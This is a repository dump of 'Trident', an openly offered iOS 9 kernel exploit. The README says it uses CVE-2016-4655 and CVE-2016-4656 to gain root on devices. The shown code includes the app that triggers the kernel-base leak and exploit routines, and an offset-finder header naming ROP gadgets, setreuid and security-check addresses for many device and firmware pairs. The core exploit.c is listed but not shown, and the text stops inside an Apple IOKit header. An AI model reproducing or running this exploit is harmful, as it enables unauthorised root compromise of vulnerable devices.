├── .gitignore ├── Trident.xcodeproj ├── project.xcworkspace │ └── contents.xcworkspacedata ├── xcuserdata │ └── benjamin.xcuserdatad │ │ └── xcschemes │ │ ├── xcschememanagement.plist │ │ └── Trident.xcscheme └── project.pbxproj ├── Trident ├── ViewController.h ├── AppDelegate.h ├── main.m ├── Assets.xcassets │ └── AppIcon.appiconset │ │ └── Contents.json ├── Info.plist ├── Base.lproj │ ├── LaunchScreen.storyboard │ └── Main.storyboard ├── ViewController.m ├── AppDelegate.m ├── offsetfinder.h └── exploit.c ├── README.md └── Headers └── IOKit ├── OSMessageNotification.h ├── IOTypes.h ├── IOKitKeys.h ├── IOReturn.h └── IOKitLib.h /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | xcuserdata -------------------------------------------------------------------------------- /Trident.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Trident/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // Trident 4 | // 5 | // Created by Benjamin Randazzo on 06/11/2016. 6 | // Copyright © 2016 Benjamin Randazzo. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | 13 | @end 14 | -------------------------------------------------------------------------------- /Trident/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // Trident 4 | // 5 | // Created by Benjamin Randazzo on 06/11/2016. 6 | // Copyright © 2016 Benjamin Randazzo. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | @end 16 | -------------------------------------------------------------------------------- /Trident/main.m: -------------------------------------------------------------------------------- 1 | // 2 | // main.m 3 | // Trident 4 | // 5 | // Created by Benjamin Randazzo on 06/11/2016. 6 | // Copyright © 2016 Benjamin Randazzo. All rights reserved. 7 | // 8 | 9 | #import 10 | #import "AppDelegate.h" 11 | 12 | int main(int argc, char * argv[]) { 13 | @autoreleasepool { 14 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /Trident.xcodeproj/xcuserdata/benjamin.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | Trident.xcscheme 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | SuppressBuildableAutocreation 14 | 15 | 43CDFA421DCFA16600046EB0 16 | 17 | primary 18 | 19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /Trident/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "29x29", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "29x29", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "40x40", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "40x40", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "60x60", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "60x60", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "ipad", 35 | "size" : "29x29", 36 | "scale" : "1x" 37 | }, 38 | { 39 | "idiom" : "ipad", 40 | "size" : "29x29", 41 | "scale" : "2x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "40x40", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "40x40", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "76x76", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "76x76", 61 | "scale" : "2x" 62 | } 63 | ], 64 | "info" : { 65 | "version" : 1, 66 | "author" : "xcode" 67 | } 68 | } -------------------------------------------------------------------------------- /Trident/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | en 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleSignature 20 | ???? 21 | CFBundleVersion 22 | 1 23 | LSRequiresIPhoneOS 24 | 25 | UILaunchStoryboardName 26 | LaunchScreen 27 | UIMainStoryboardFile 28 | Main 29 | UIRequiredDeviceCapabilities 30 | 31 | armv7 32 | 33 | UISupportedInterfaceOrientations 34 | 35 | UIInterfaceOrientationPortrait 36 | UIInterfaceOrientationLandscapeLeft 37 | UIInterfaceOrientationLandscapeRight 38 | UIInterfaceOrientationPortraitUpsideDown 39 | 40 | UISupportedInterfaceOrientations~ipad 41 | 42 | UIInterfaceOrientationPortrait 43 | UIInterfaceOrientationPortraitUpsideDown 44 | UIInterfaceOrientationLandscapeLeft 45 | UIInterfaceOrientationLandscapeRight 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /Trident/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Trident 2 | 3 | This exploits the following two CVEs: 4 | * CVE-2016-4655: allow an attacker to obtain sensitive information from kernel memory via a crafted app 5 | * CVE-2016-4656: allow an attacker to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app 6 | 7 | CVE-2016-4657 (WebKit exploit) is NOT included despite the name of the project being called *Trident*. Only kernel vulnerabilities are being exploited here. 8 | 9 | The objective of the exploit is to gain root access over the device. 10 | 11 | At this point it would be possible to jailbreak the device by applying more patches to the kernel (for sandbox, code signing enforcement and more). jk9357 did it and released [Home Depot](http://wall.supplies), a jailbreak based on this exploit. 12 | 13 | iOS 9.3.5 is not supported as vulnerabilities have been patched in that version. 14 | 15 | Supported devices: see offsetfinder.h 16 | 17 | [Guide for finding offsets by angelXwind](https://angelxwind.net/?page/trident-address-tutorial) 18 | 19 | References: 20 | [Original exploit disclosure by Lookout](http://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf) 21 | [OS X exploit by jndok](https://jndok.github.io/2016/10/04/pegasus-writeup/) 22 | 23 | Thanks: Lookout, Pangu team, i0n1c, jndok, kernelpool, planetbeing, qwertyoruiop, winocm 24 | 25 | > I could feel 26 | > it coming back 27 | > I didn't know 28 | > was I built to last 29 | > I've come so far so fast 30 | > and it feels like a hundred years 31 | > am I dreaming' 32 | > is it gonna last 33 | > I could be 34 | > better still 35 | > than anything 36 | > I've done 37 | > I know ya think 38 | > You could do too 39 | > I know ya think 40 | > You feel it's true 41 | > Its the little things in life 42 | > that I feel 43 | -------------------------------------------------------------------------------- /Trident/ViewController.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // Trident 4 | // 5 | // Created by Benjamin Randazzo on 06/11/2016. 6 | // Copyright © 2016 Benjamin Randazzo. All rights reserved. 7 | // 8 | 9 | #import "ViewController.h" 10 | 11 | #include 12 | #include "offsetfinder.h" 13 | 14 | void initialize(void); 15 | uint32_t leak_kernel_base(void); 16 | void exploit(uint32_t, bool); 17 | 18 | @interface ViewController () 19 | @property (weak, nonatomic) IBOutlet UIButton *button; 20 | @property (weak, nonatomic) IBOutlet UILabel *environmentLabel; 21 | @end 22 | 23 | @implementation ViewController 24 | 25 | - (void)viewDidLoad { 26 | [super viewDidLoad]; 27 | // Do any additional setup after loading the view, typically from a nib. 28 | 29 | // Initialize environment target. 30 | NSString *systemVersion = [[UIDevice currentDevice] systemVersion]; 31 | struct utsname name; 32 | NSString *environment; 33 | 34 | uname(&name); 35 | init_target_environment(name.machine, [systemVersion cStringUsingEncoding:NSUTF8StringEncoding]); 36 | 37 | // Update interface. 38 | environment = [NSString stringWithFormat:@"%s - iOS %@", name.machine, systemVersion]; 39 | if (target_environment == NotSupported) { 40 | self.button.enabled = NO; 41 | environment = [environment stringByAppendingString:@" (not supported)"]; 42 | } 43 | self.environmentLabel.text = environment; 44 | } 45 | 46 | - (void)didReceiveMemoryWarning { 47 | [super didReceiveMemoryWarning]; 48 | // Dispose of any resources that can be recreated. 49 | } 50 | 51 | - (IBAction)start:(id)sender { 52 | initialize(); 53 | uint32_t kernel_base = leak_kernel_base(); 54 | printf("kernel base: %p\n", (void *)kernel_base); 55 | 56 | bool pre91 = strncmp([[[UIDevice currentDevice] systemVersion] cStringUsingEncoding:NSUTF8StringEncoding], "9.0", 3) == 0; 57 | exploit(kernel_base, pre91); 58 | 59 | // Update button. 60 | self.button.enabled = NO; 61 | [self.button setTitle:@"w00t root" forState:UIControlStateNormal]; 62 | } 63 | 64 | @end 65 | -------------------------------------------------------------------------------- /Trident/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // Trident 4 | // 5 | // Created by Benjamin Randazzo on 06/11/2016. 6 | // Copyright © 2016 Benjamin Randazzo. All rights reserved. 7 | // 8 | 9 | #import "AppDelegate.h" 10 | 11 | @interface AppDelegate () 12 | 13 | @end 14 | 15 | @implementation AppDelegate 16 | 17 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 18 | // Override point for customization after application launch. 19 | return YES; 20 | } 21 | 22 | - (void)applicationWillResignActive:(UIApplication *)application { 23 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 24 | // Use this method to pause ongoing tasks, disable timers, and throttle down OpenGL ES frame rates. Games should use this method to pause the game. 25 | } 26 | 27 | - (void)applicationDidEnterBackground:(UIApplication *)application { 28 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 29 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 30 | } 31 | 32 | - (void)applicationWillEnterForeground:(UIApplication *)application { 33 | // Called as part of the transition from the background to the inactive state; here you can undo many of the changes made on entering the background. 34 | } 35 | 36 | - (void)applicationDidBecomeActive:(UIApplication *)application { 37 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 38 | } 39 | 40 | - (void)applicationWillTerminate:(UIApplication *)application { 41 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 42 | } 43 | 44 | @end 45 | -------------------------------------------------------------------------------- /Trident.xcodeproj/xcuserdata/benjamin.xcuserdatad/xcschemes/Trident.xcscheme: -------------------------------------------------------------------------------- 1 | 2 | 5 | 8 | 9 | 15 | 21 | 22 | 23 | 24 | 25 | 30 | 31 | 32 | 33 | 39 | 40 | 41 | 42 | 43 | 44 | 54 | 56 | 62 | 63 | 64 | 65 | 66 | 67 | 73 | 75 | 81 | 82 | 83 | 84 | 86 | 87 | 90 | 91 | 92 | -------------------------------------------------------------------------------- /Headers/IOKit/OSMessageNotification.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | /* 29 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 30 | * 31 | * HISTORY 32 | * 33 | */ 34 | 35 | #ifndef __OS_OSMESSAGENOTIFICATION_H 36 | #define __OS_OSMESSAGENOTIFICATION_H 37 | 38 | #ifdef __cplusplus 39 | extern "C" { 40 | #endif 41 | 42 | #include 43 | #include 44 | #include 45 | 46 | enum { 47 | kFirstIOKitNotificationType = 100, 48 | kIOServicePublishNotificationType = 100, 49 | kIOServiceMatchedNotificationType = 101, 50 | kIOServiceTerminatedNotificationType = 102, 51 | kIOAsyncCompletionNotificationType = 150, 52 | kIOServiceMessageNotificationType = 160, 53 | kLastIOKitNotificationType = 199, 54 | 55 | // reserved bits 56 | kIOKitNoticationTypeMask = 0x00000FFF, 57 | kIOKitNoticationTypeSizeAdjShift = 30, 58 | kIOKitNoticationMsgSizeMask = 3, 59 | }; 60 | 61 | enum { 62 | kOSNotificationMessageID = 53, 63 | kOSAsyncCompleteMessageID = 57, 64 | kMaxAsyncArgs = 16 65 | }; 66 | 67 | enum { 68 | kIOAsyncReservedIndex = 0, 69 | kIOAsyncReservedCount, 70 | 71 | kIOAsyncCalloutFuncIndex = kIOAsyncReservedCount, 72 | kIOAsyncCalloutRefconIndex, 73 | kIOAsyncCalloutCount, 74 | 75 | kIOMatchingCalloutFuncIndex = kIOAsyncReservedCount, 76 | kIOMatchingCalloutRefconIndex, 77 | kIOMatchingCalloutCount, 78 | 79 | kIOInterestCalloutFuncIndex = kIOAsyncReservedCount, 80 | kIOInterestCalloutRefconIndex, 81 | kIOInterestCalloutServiceIndex, 82 | kIOInterestCalloutCount 83 | }; 84 | 85 | 86 | 87 | // -------------- 88 | enum { 89 | kOSAsyncRef64Count = 8, 90 | kOSAsyncRef64Size = kOSAsyncRef64Count * ((int) sizeof(io_user_reference_t)) 91 | }; 92 | typedef io_user_reference_t OSAsyncReference64[kOSAsyncRef64Count]; 93 | 94 | struct OSNotificationHeader64 { 95 | mach_msg_size_t size; /* content size */ 96 | natural_t type; 97 | OSAsyncReference64 reference; 98 | 99 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L) 100 | unsigned char content[]; 101 | #else 102 | unsigned char content[0]; 103 | #endif 104 | }; 105 | 106 | #pragma pack(4) 107 | struct IOServiceInterestContent64 { 108 | natural_t messageType; 109 | io_user_reference_t messageArgument[1]; 110 | }; 111 | #pragma pack() 112 | // -------------- 113 | 114 | #if !KERNEL_USER32 115 | 116 | enum { 117 | kOSAsyncRefCount = 8, 118 | kOSAsyncRefSize = 32 119 | }; 120 | typedef natural_t OSAsyncReference[kOSAsyncRefCount]; 121 | 122 | struct OSNotificationHeader { 123 | mach_msg_size_t size; /* content size */ 124 | natural_t type; 125 | OSAsyncReference reference; 126 | 127 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L) 128 | unsigned char content[]; 129 | #else 130 | unsigned char content[0]; 131 | #endif 132 | }; 133 | 134 | #pragma pack(4) 135 | struct IOServiceInterestContent { 136 | natural_t messageType; 137 | void * messageArgument[1]; 138 | }; 139 | #pragma pack() 140 | 141 | #endif /* KERNEL_USER32 */ 142 | 143 | struct IOAsyncCompletionContent { 144 | IOReturn result; 145 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L) 146 | void * args[] __attribute__ ((packed)); 147 | #else 148 | void * args[0] __attribute__ ((packed)); 149 | #endif 150 | }; 151 | 152 | #ifndef __cplusplus 153 | typedef struct OSNotificationHeader OSNotificationHeader; 154 | typedef struct IOServiceInterestContent IOServiceInterestContent; 155 | typedef struct IOAsyncCompletionContent IOAsyncCompletionContent; 156 | #endif 157 | 158 | #ifdef __cplusplus 159 | } 160 | #endif 161 | 162 | #endif /* __OS_OSMESSAGENOTIFICATION_H */ 163 | 164 | -------------------------------------------------------------------------------- /Trident/offsetfinder.h: -------------------------------------------------------------------------------- 1 | // 2 | // offsetfinder.h 3 | // Trident 4 | // 5 | // Created by Benjamin Randazzo on 14/12/2016. 6 | // Copyright © 2016 Benjamin Randazzo. All rights reserved. 7 | // 8 | 9 | #ifndef offsetfinder_h 10 | #define offsetfinder_h 11 | 12 | #include 13 | 14 | typedef enum { 15 | NotSupported, 16 | iPhone41_iOS902, 17 | iPhone41_iOS910, 18 | iPhone41_iOS920, 19 | iPhone41_iOS921, 20 | iPhone41_iOS930, 21 | iPhone41_iOS931, 22 | iPhone41_iOS932, 23 | iPhone41_iOS933, 24 | iPhone41_iOS934, 25 | iPhone51_iOS910, 26 | iPhone51_iOS920, 27 | iPhone51_iOS921, 28 | iPhone51_iOS930, 29 | iPhone51_iOS931, 30 | iPhone51_iOS932, 31 | iPhone51_iOS933, 32 | iPhone51_iOS934, 33 | iPhone52_iOS902, 34 | iPhone52_iOS910, 35 | iPhone52_iOS920, 36 | iPhone52_iOS921, 37 | iPhone52_iOS930, 38 | iPhone52_iOS931, 39 | iPhone52_iOS932, 40 | iPhone52_iOS933, 41 | iPhone52_iOS934, 42 | iPhone53_iOS910, 43 | iPhone53_iOS920, 44 | iPhone53_iOS921, 45 | iPhone53_iOS930, 46 | iPhone53_iOS931, 47 | iPhone53_iOS932, 48 | iPhone53_iOS933, 49 | iPhone53_iOS934, 50 | iPhone54_iOS910, 51 | iPhone54_iOS920, 52 | iPhone54_iOS921, 53 | iPhone54_iOS930, 54 | iPhone54_iOS931, 55 | iPhone54_iOS932, 56 | iPhone54_iOS933, 57 | iPhone54_iOS934, 58 | iPad21_iOS910, 59 | iPad21_iOS920, 60 | iPad21_iOS921, 61 | iPad21_iOS930, 62 | iPad21_iOS931, 63 | iPad21_iOS932, 64 | iPad21_iOS933, 65 | iPad21_iOS934, 66 | iPad22_iOS910, 67 | iPad22_iOS920, 68 | iPad22_iOS921, 69 | iPad22_iOS930, 70 | iPad22_iOS931, 71 | iPad22_iOS932, 72 | iPad22_iOS933, 73 | iPad22_iOS934, 74 | iPad23_iOS910, 75 | iPad23_iOS920, 76 | iPad23_iOS921, 77 | iPad23_iOS930, 78 | iPad23_iOS931, 79 | iPad23_iOS932, 80 | iPad23_iOS933, 81 | iPad23_iOS934, 82 | iPad24_iOS910, 83 | iPad24_iOS920, 84 | iPad24_iOS921, 85 | iPad24_iOS930, 86 | iPad24_iOS931, 87 | iPad24_iOS932, 88 | iPad24_iOS933, 89 | iPad24_iOS934, 90 | iPad25_iOS902, 91 | iPad25_iOS910, 92 | iPad25_iOS920, 93 | iPad25_iOS921, 94 | iPad25_iOS930, 95 | iPad25_iOS931, 96 | iPad25_iOS932, 97 | iPad25_iOS933, 98 | iPad25_iOS934, 99 | iPad26_iOS910, 100 | iPad26_iOS920, 101 | iPad26_iOS921, 102 | iPad26_iOS930, 103 | iPad26_iOS931, 104 | iPad26_iOS932, 105 | iPad26_iOS933, 106 | iPad26_iOS934, 107 | iPad27_iOS910, 108 | iPad27_iOS920, 109 | iPad27_iOS921, 110 | iPad27_iOS930, 111 | iPad27_iOS931, 112 | iPad27_iOS932, 113 | iPad27_iOS933, 114 | iPad27_iOS934, 115 | iPad31_iOS910, 116 | iPad31_iOS920, 117 | iPad31_iOS921, 118 | iPad31_iOS930, 119 | iPad31_iOS931, 120 | iPad31_iOS932, 121 | iPad31_iOS933, 122 | iPad31_iOS934, 123 | iPad32_iOS910, 124 | iPad32_iOS920, 125 | iPad32_iOS921, 126 | iPad32_iOS930, 127 | iPad32_iOS931, 128 | iPad32_iOS932, 129 | iPad32_iOS933, 130 | iPad32_iOS934, 131 | iPad33_iOS902, 132 | iPad33_iOS910, 133 | iPad33_iOS920, 134 | iPad33_iOS921, 135 | iPad33_iOS930, 136 | iPad33_iOS931, 137 | iPad33_iOS932, 138 | iPad33_iOS933, 139 | iPad33_iOS934, 140 | iPad34_iOS910, 141 | iPad34_iOS920, 142 | iPad34_iOS921, 143 | iPad34_iOS930, 144 | iPad34_iOS931, 145 | iPad34_iOS932, 146 | iPad34_iOS933, 147 | iPad34_iOS934, 148 | iPad35_iOS910, 149 | iPad35_iOS920, 150 | iPad35_iOS921, 151 | iPad35_iOS930, 152 | iPad35_iOS931, 153 | iPad35_iOS932, 154 | iPad35_iOS933, 155 | iPad35_iOS934, 156 | iPad36_iOS910, 157 | iPad36_iOS920, 158 | iPad36_iOS921, 159 | iPad36_iOS930, 160 | iPad36_iOS931, 161 | iPad36_iOS932, 162 | iPad36_iOS933, 163 | iPad36_iOS934, 164 | iPod51_iOS910, 165 | iPod51_iOS920, 166 | iPod51_iOS921, 167 | iPod51_iOS930, 168 | iPod51_iOS931, 169 | iPod51_iOS932, 170 | iPod51_iOS933, 171 | iPod51_iOS934 172 | } t_target_environment; 173 | 174 | extern t_target_environment target_environment; 175 | 176 | // Initializer 177 | void init_target_environment(const char *device_model, const char *system_version); 178 | 179 | // OSSerializer::serialize 180 | uint32_t find_OSSerializer_serialize(void); 181 | 182 | // OSSymbol::getMetaClass 183 | uint32_t find_OSSymbol_getMetaClass(void); 184 | 185 | // calend_gettime 186 | uint32_t find_calend_gettime(void); 187 | 188 | // _bufattr_cpx 189 | uint32_t find_bufattr_cpx(void); 190 | 191 | // clock_ops 192 | uint32_t find_clock_ops(void); 193 | 194 | // _copyin 195 | uint32_t find_copyin(void); 196 | 197 | // BX LR 198 | uint32_t find_bx_lr(void); 199 | 200 | // write_gadget: str r1, [r0, #0xc] ; bx lr 201 | uint32_t find_write_gadget(void); 202 | 203 | // vm_kernel_addrperm 204 | uint32_t find_vm_kernel_addrperm(void); 205 | 206 | // kernel_pmap 207 | uint32_t find_kernel_pmap(void); 208 | 209 | // flush_dcache 210 | uint32_t find_flush_dcache(void); 211 | 212 | // invalidate_tlb 213 | uint32_t find_invalidate_tlb(void); 214 | 215 | // task_for_pid 216 | uint32_t find_task_for_pid(void); 217 | 218 | // setreuid 219 | uint32_t find_setreuid(void); 220 | 221 | // setreuid cred update 222 | uint32_t find_setreuid_cred_update(void); 223 | 224 | // pid_check_addr offset 225 | uint32_t find_pid_check(void); 226 | 227 | // posix_check_ret_addr offset 228 | uint32_t find_posix_check(void); 229 | 230 | // mac_proc_check_ret_addr offset 231 | uint32_t find_mac_proc_check(void); 232 | 233 | #endif /* offsetfinder_h */ 234 | -------------------------------------------------------------------------------- /Headers/IOKit/IOTypes.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1998-2012 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | #ifndef __IOKIT_IOTYPES_H 29 | #define __IOKIT_IOTYPES_H 30 | 31 | #ifndef IOKIT 32 | #define IOKIT 1 33 | #endif /* !IOKIT */ 34 | 35 | #include 36 | #include 37 | 38 | #include 39 | 40 | #ifdef __cplusplus 41 | extern "C" { 42 | #endif 43 | 44 | #ifndef NULL 45 | #if defined (__cplusplus) 46 | #define NULL 0 47 | #else 48 | #define NULL ((void *)0) 49 | #endif 50 | #endif 51 | 52 | /* 53 | * Simple data types. 54 | */ 55 | #include 56 | //#include 57 | 58 | 59 | typedef UInt32 IOOptionBits; 60 | typedef SInt32 IOFixed; 61 | typedef UInt32 IOVersion; 62 | typedef UInt32 IOItemCount; 63 | typedef UInt32 IOCacheMode; 64 | 65 | typedef UInt32 IOByteCount32; 66 | typedef UInt64 IOByteCount64; 67 | 68 | typedef UInt32 IOPhysicalAddress32; 69 | typedef UInt64 IOPhysicalAddress64; 70 | typedef UInt32 IOPhysicalLength32; 71 | typedef UInt64 IOPhysicalLength64; 72 | 73 | #if !defined(__arm__) && !defined(__i386__) 74 | typedef mach_vm_address_t IOVirtualAddress; 75 | #else 76 | typedef vm_address_t IOVirtualAddress; 77 | #endif 78 | 79 | #if !defined(__arm__) && !defined(__i386__) && !(defined(__x86_64__) && !defined(KERNEL)) 80 | typedef IOByteCount64 IOByteCount; 81 | #else 82 | typedef IOByteCount32 IOByteCount; 83 | #endif 84 | 85 | typedef IOVirtualAddress IOLogicalAddress; 86 | 87 | #if !defined(__arm__) && !defined(__i386__) && !(defined(__x86_64__) && !defined(KERNEL)) 88 | 89 | typedef IOPhysicalAddress64 IOPhysicalAddress; 90 | typedef IOPhysicalLength64 IOPhysicalLength; 91 | #define IOPhysical32( hi, lo ) ((UInt64) lo + ((UInt64)(hi) << 32)) 92 | #define IOPhysSize 64 93 | 94 | #else 95 | 96 | typedef IOPhysicalAddress32 IOPhysicalAddress; 97 | typedef IOPhysicalLength32 IOPhysicalLength; 98 | #define IOPhysical32( hi, lo ) (lo) 99 | #define IOPhysSize 32 100 | 101 | #endif 102 | 103 | 104 | typedef struct 105 | { 106 | IOPhysicalAddress address; 107 | IOByteCount length; 108 | } IOPhysicalRange; 109 | 110 | typedef struct 111 | { 112 | IOVirtualAddress address; 113 | IOByteCount length; 114 | } IOVirtualRange; 115 | 116 | #if !defined(__arm__) && !defined(__i386__) 117 | typedef IOVirtualRange IOAddressRange; 118 | #else 119 | typedef struct 120 | { 121 | mach_vm_address_t address; 122 | mach_vm_size_t length; 123 | } IOAddressRange; 124 | #endif 125 | 126 | /* 127 | * Map between #defined or enum'd constants and text description. 128 | */ 129 | typedef struct { 130 | int value; 131 | const char *name; 132 | } IONamedValue; 133 | 134 | 135 | /* 136 | * Memory alignment -- specified as a power of two. 137 | */ 138 | typedef unsigned int IOAlignment; 139 | 140 | #define IO_NULL_VM_TASK ((vm_task_t)0) 141 | 142 | 143 | /* 144 | * Pull in machine specific stuff. 145 | */ 146 | 147 | //#include 148 | 149 | #ifndef MACH_KERNEL 150 | 151 | #ifndef __IOKIT_PORTS_DEFINED__ 152 | #define __IOKIT_PORTS_DEFINED__ 153 | typedef mach_port_t io_object_t; 154 | #endif /* __IOKIT_PORTS_DEFINED__ */ 155 | 156 | #include 157 | 158 | typedef io_object_t io_connect_t; 159 | typedef io_object_t io_enumerator_t; 160 | typedef io_object_t io_iterator_t; 161 | typedef io_object_t io_registry_entry_t; 162 | typedef io_object_t io_service_t; 163 | 164 | #define IO_OBJECT_NULL ((io_object_t) 0) 165 | 166 | #endif /* MACH_KERNEL */ 167 | 168 | // IOConnectMapMemory memoryTypes 169 | enum { 170 | kIODefaultMemoryType = 0 171 | }; 172 | 173 | enum { 174 | kIODefaultCache = 0, 175 | kIOInhibitCache = 1, 176 | kIOWriteThruCache = 2, 177 | kIOCopybackCache = 3, 178 | kIOWriteCombineCache = 4, 179 | kIOCopybackInnerCache = 5 180 | }; 181 | 182 | // IOMemory mapping options 183 | enum { 184 | kIOMapAnywhere = 0x00000001, 185 | 186 | kIOMapCacheMask = 0x00000700, 187 | kIOMapCacheShift = 8, 188 | kIOMapDefaultCache = kIODefaultCache << kIOMapCacheShift, 189 | kIOMapInhibitCache = kIOInhibitCache << kIOMapCacheShift, 190 | kIOMapWriteThruCache = kIOWriteThruCache << kIOMapCacheShift, 191 | kIOMapCopybackCache = kIOCopybackCache << kIOMapCacheShift, 192 | kIOMapWriteCombineCache = kIOWriteCombineCache << kIOMapCacheShift, 193 | kIOMapCopybackInnerCache = kIOCopybackInnerCache << kIOMapCacheShift, 194 | 195 | kIOMapUserOptionsMask = 0x00000fff, 196 | 197 | kIOMapReadOnly = 0x00001000, 198 | 199 | kIOMapStatic = 0x01000000, 200 | kIOMapReference = 0x02000000, 201 | kIOMapUnique = 0x04000000, 202 | kIOMapPrefault = 0x10000000, 203 | kIOMapOverwrite = 0x20000000 204 | }; 205 | 206 | /*! @enum Scale Factors 207 | @discussion Used when a scale_factor parameter is required to define a unit of time. 208 | @constant kNanosecondScale Scale factor for nanosecond based times. 209 | @constant kMicrosecondScale Scale factor for microsecond based times. 210 | @constant kMillisecondScale Scale factor for millisecond based times. 211 | @constant kTickScale Scale factor for the standard (100Hz) tick. 212 | @constant 